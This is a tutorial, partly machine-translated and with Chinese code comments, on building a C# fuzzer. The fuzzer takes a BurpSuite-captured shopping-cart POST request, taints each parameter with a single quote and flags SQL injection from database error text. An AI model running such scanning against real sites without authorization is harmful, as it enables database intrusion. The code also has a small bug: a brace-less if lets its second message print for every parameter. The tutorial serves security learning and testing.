Fuzzing POST requests

ready

First of all, we have to use BurpSuite to capture the data on the shopping cart. After we check the product we want to select, then click Add shopping cart

. The data package we captured is as follows. You can see cartitemthat there may be SQL injection in the parameters. Because this parameter will be detected in the background, we can taint the parameter here and pass in malicious code execution to try to attack the database.

Then we copy and save the contents request.txtin the exesame directory as the file

Code

Before performing the fuzzing test, we must first Main()set the necessary parameters,很多代码运行原理我都在代码注释里写了，读者有不懂的话可以私聊评论我

using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace POST模糊测试
{
    
    
    class Program
    {
    
    
        static void Main(string[] args)
        {
    
    
            //我们不使用ReadAllText()的原因是我们需要拆分请求，以便在模糊测试之前获取信息
            string[] requestLines = File.ReadAllLines(args[0]);
            string[] parms = requestLines[requestLines.Length - 1].Split('&');
            string host = string.Empty;
            StringBuilder requestBuilder = new StringBuilder();

            foreach(string ln in requestLines)
            {
    
    
                //我们检查行是否以'Host:'开头，如果是则将主机字符串的后半部分分配给host变量
                if (ln.StartsWith("Host:"))
                {
    
    
                    //使用Replace()方法替换掉可能留下的'\r'，因为一个IP地址中没有'\r'
                    host = ln.Split(' ')[1].Replace("\r", string.Empty);
                }
                requestBuilder.Append(ln + "\n");
            }
            string request = requestBuilder.ToString() + "\r\n";
            Console.WriteLine(request);

            /*
             传递一个新的IPAddress对象和要连接的80端口来创建一个新的IPEndPoint对象
             */
            IPEndPoint rhost = new IPEndPoint(IPAddress.Parse(host), 80);
        }
    }
}

Add the foreach code to the Main() function

foreach(string parm in parms)
            {
    
    
                /*
                 1.对于每次迭代，我们需要创建一个新的Socket连接到服务器
                 2.AddressFamily.InterNetwork告诉套接字使用IPv4协议
                 3.SocketType.Stream告诉套接字使用一个流套接字(有状态，双向，可靠)
                 4.ProtocolType.Tcp套接字要使用的协议是TCP
                 */
                using (Socket sock = new Socket(AddressFamily.InterNetwork,
                    SocketType.Stream, ProtocolType.Tcp))
                {
    
    
                    sock.Connect(rhost);

                    string val = parm.Split('=')[1];
                    //调用request字符串中的Replace()方法把原始值替换成一个污染过的值
                    string req = request.Replace('=' + val, "=" + val + "'");

                    //获取一个字符串的字节数组
                    byte[] reqBytes = Encoding.ASCII.GetBytes(req);
                    sock.Send(reqBytes);

                    //创建一个响应大小相等的字节数组
                    byte[] buf = new byte[sock.ReceiveBufferSize];

                    sock.Receive(buf);
                    string response = Encoding.ASCII.GetString(buf);    //解析服务器的响应
                    if (response.Contains("error in your SQL syntax"))
                        Console.WriteLine("Parameter" + parm + " seems vunerable");
                        Console.WriteLine(" to SQL injection with value: " + val + "'");
                }
            }

The running effect is as shown in the figure below